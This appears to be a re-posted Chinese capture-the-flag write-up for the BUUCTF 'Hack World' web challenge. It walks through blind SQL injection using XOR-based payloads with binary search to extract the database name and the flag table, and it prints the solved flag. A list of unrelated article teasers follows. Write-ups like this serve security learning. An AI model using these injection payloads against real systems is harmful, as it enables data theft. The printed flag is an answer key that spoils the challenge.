buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World

buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World

1.根据提示,说明flag在表里
在这里插入图片描述

2.那就猜测存在sql注入,反手测试一波id=1'
在这里插入图片描述
3.尝试使用1'--+进行注释
在这里插入图片描述
4.直接丢进salmap里吧,不出意外多半是跑不出来
在这里插入图片描述
5.直接放入fuzz里进行测试
在这里插入图片描述
6.发现当我们使用异或时,出现了提示
Hello, glzjin wants a girlfriend.
在这里插入图片描述
7.那我们就按照这个思路进行注入
异或异或,相同为0,不同为1
在这里插入图片描述
在这里插入图片描述
8.判断数据库的长度

0^(length(database())>0)

在这里插入图片描述

0^(length(database())>16)

在这里插入图片描述
9.使用折半查找的方式进行测试
在这里插入图片描述

0^(length(database())>13)

在这里插入图片描述

0^(length(database())>10)

在这里插入图片描述

0^(length(database())>11)

在这里插入图片描述
10.说明数据库的长度为11

0^(length(database())=11)

在这里插入图片描述
12.判断数据库名

0^(ascii(substr(database(),1,1))>80)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>100)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>90)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>95)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>97)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>98)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>99)

在这里插入图片描述

id=0^(ascii(substr(database(),1,1))=99)

在这里插入图片描述

中间的折磨了好久想爆破数据库的表名,走啦好多的弯路,可以直接出来的

0^(ascii(substr((select(flag)from(flag)),{},1))>{})

在这里插入图片描述

flag{bcc3af9d-a5ee-4395-a540-ffb516eaba15}

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/828501.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

iOS - 多线程-GCD

iOS - 多线程-GCD

文章目录 iOS - 多线程-GCD1. 常见多线程方案2. GCD2.1 GCD的常见函数GCD中有2个用来执行任务的函数 2.2 GCD的队列2.2.1 GCD的队列可以分为2大类型 2.3 容易混淆的术语2.4.1 有4个术语比较容易混淆:同步、异步、并发、串行 2.4 各种队列的执行效果 3. 死锁3.1 死锁…
阅读更多...
Composer初次接触

Composer初次接触

php一直都是简单处理一下单片机的后台服务,没什么深入研究 今天安装一个 php composer.phar require qiniu/php-sdkComposer完全不懂,照着一试,就报错了 - topthink/think-installer v1.0.12 requires composer-plugin-api ^1.0 -> found…
阅读更多...
ThreeJs模拟工厂生产过程三

ThreeJs模拟工厂生产过程三

上节课绘制了车间模型,但是车间里只有一条产线,这节把产线多铺设几条,放满整个车间,但是随着放满车间吗,也就意味着要创建更多的模型,而更多的模型会导致浏览器卡顿,所以这个节讲如何做模型合并…
阅读更多...
Python | Leetcode Python题解之第48题旋转图像

Python | Leetcode Python题解之第48题旋转图像

题目: 题解: class Solution:def rotate(self, matrix: List[List[int]]) -> None:n len(matrix)# 水平翻转for i in range(n // 2):for j in range(n):matrix[i][j], matrix[n - i - 1][j] matrix[n - i - 1][j], matrix[i][j]# 主对角线翻转for …
阅读更多...
Python400集 视频教程,手把手带你零基础手写神经网络!!

Python400集 视频教程,手把手带你零基础手写神经网络!!

嗨喽,大家好,今天又要给大家整一波福利了! 学习编程,最忌讳就是今天一个教程,明天一个教程,频繁更换教程,增加自己的学习成本,对于新手小白会是一件严重打击自信心的事情。所以今天…
阅读更多...
四川尚熠电子商务有限公司抖音电商新势力的崛起

四川尚熠电子商务有限公司抖音电商新势力的崛起

在当下这个数字化高速发展的时代,电子商务已经成为推动经济增长的重要引擎之一。四川尚熠电子商务有限公司,作为一股新兴的电商力量,专注于抖音电商服务,凭借其独特的市场洞察力和创新精神,正逐步在激烈的市场竞争中崭…
阅读更多...
portaudio 怎么调用获取输出流

portaudio 怎么调用获取输出流

PortAudio是一个跨平台的音频I/O库,它允许你访问计算机的音频硬件进行录音和播放。要使用PortAudio获取输出流(播放流),你需要遵循以下步骤: 官方下载地址:PortAudio - an Open-Source Cross-Platform Audi…
阅读更多...
Linux 系统IO函数之open函数

Linux 系统IO函数之open函数

open函数 要点: int open(const char *pathname, int flags); perror函数 close函数 控制台输入: man 2 open2 表示第二章(Linux系统IO函数位于第二章),第三章是标准C库的一些函数部分输出: 1、open函数返…
阅读更多...
【ruoyi-vue】axios的封装理解和基本使用

【ruoyi-vue】axios的封装理解和基本使用

axios的配置 ruoyi的前端对axios进行了封装,让我们发get请求或者是post请求更加方便了。 ruoyi对axios的封装在下面文件中:打开文件,可以看到它有三个显眼的方法,分别是request拦截器、response拦截器和通用下载方法。ruoYi接口地…
阅读更多...
RK3588构建ubuntu22.04根文件系统

RK3588构建ubuntu22.04根文件系统

前言 RK系列的平台提供了buildroot和debian的系统,使用脚本可以直接构建出来,但是没有提供ubuntu的系统,很多厂商只提供一个rootfs.img的固件包,没有将方法开源出来。本文实现了从ubuntu官网开始构建一个ubuntu22.04根文件系统。…
阅读更多...
【信息收集】端口扫描masscan负载均衡识别lbd

【信息收集】端口扫描masscan负载均衡识别lbd

★★免责声明★★ 文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与学习之用,读者将信息做其他用途,由Ta承担全部法律及连带责任,文章作者不承担任何法律及连带责任。 1、什么是masscan masscan在kali系统上是自带的端口扫描…
阅读更多...
用Redis实现获取验证码,外加安全策略

用Redis实现获取验证码,外加安全策略

安全策略 一小时内只能获取三次,一天内只能获取五次 Redis存储结构 代码展示 import cn.hutool.core.util.RandomUtil; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import org.junit.jupiter.api.Test; import org.spri…
阅读更多...
学习笔记:Vue3(图片明天处理)

学习笔记:Vue3(图片明天处理)

文章目录 1.概述1.1定义1.2特性1.3组合式API 2.基本用例-项目搭建3.项目目录介绍3.1概述3.2查看文件 4.组合式API4.1概述4.2新的API风格4.2.1概述4.2.2写法4.2.3基本用例-Setup选项使用4.2.4基本用例-语法糖写法(重点)4.2.5执行时机4.2.6代码特点 4.3响应…
阅读更多...
我的读书摘记《点燃孩子的学习动力:关于儿童学习兴趣的真相》

我的读书摘记《点燃孩子的学习动力:关于儿童学习兴趣的真相》

德韦克认为乔丹的经历揭示了那些最卓越的学习者身上的一个秘密:人的天赋,是可以不断发展的!不管早期的天赋如何,人终将不断超越自己,发展自己的天赋。 思维方式决定了学习的成功与否!这也意味着&#xff0…
阅读更多...
【数据结构】三、栈和队列:5.顺序队列(循环队列)(初始化,判空判满,入队,出队,实例)

【数据结构】三、栈和队列:5.顺序队列(循环队列)(初始化,判空判满,入队,出队,实例)

文章目录 队列Queue逻辑结构物理(存储)结构基本操作1.顺序队列(循环队列)1.1初始化1.2判空&判满1.2.1判空1.2.2判满方案一方案二方案三 1.3入队循环队列 1.4出队1.5获取队头元素1.6获取队列元素个数❗1.7循环队列c实例 队列Qu…
阅读更多...
安卓Activity的setContentView()流程分析

安卓Activity的setContentView()流程分析

目录 前言一、Activity的视图加载过程1.1 视图结构1.2 流程分析1.2.1 Activity.java -->setContentView()1.2.2 Activity.java -->getWindow()1.2.3 PhoneWindow.java -->setContentView()1.2.4 PhoneWindow.java --->installDecor()1.2.4.1 PhoneWindow.java ---&…
阅读更多...
SD-WAN怎样保障网络稳定

SD-WAN怎样保障网络稳定

随着企业网络的日益复杂,如何确保线路的稳定性和高效性成为了网络管理的一大挑战。尤其是在线路出现故障、质量下降或拥塞时,如何快速响应并切换到最佳线路,就显得尤为重要。SD-WAN,作为一种新型的网络架构,为用户提供…
阅读更多...
周报不止是汇报进度,如何用周报轻松提升团队协作效率?

周报不止是汇报进度,如何用周报轻松提升团队协作效率?

周报是工作中常见的沟通工具,对于项目经理来说尤其重要。写周报不仅仅是为了完成一项任务,它更是项目管理中不可或缺的环节,它不仅有助于项目经理跟踪项目进度,还加强了团队成员间的沟通与协作。以下是几个关键的原因:…
阅读更多...
北京车展打响新汽车“第一枪”,长安造车40年,开启“汽车机器人”时代

北京车展打响新汽车“第一枪”,长安造车40年,开启“汽车机器人”时代

4月25日,睽违四年的2024(第十八届)北京国际汽车展览会正式启幕,此次车展以“新时代 新汽车”为主题,吸引全球1500余家主流车企及零部件制造商同台“打擂”。其中,长安汽车以“数智启源随你而变”为主题,携各子品牌及合…
阅读更多...
掌握未来通信技术:5G核心网基础入门

掌握未来通信技术:5G核心网基础入门

🔥个人主页:Quitecoder 🔥专栏:5GC笔记仓 朋友们大家好,本篇文章是我们新内容的开始,我们本篇进入5GC的学习,希望大家多多支持! 目录 一.核心网的演进2G核心网2.5G核心网3G核心网4G…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023

友情链接: 我的编程经验分享 一条长河网 尧图网站开发 尧图建网站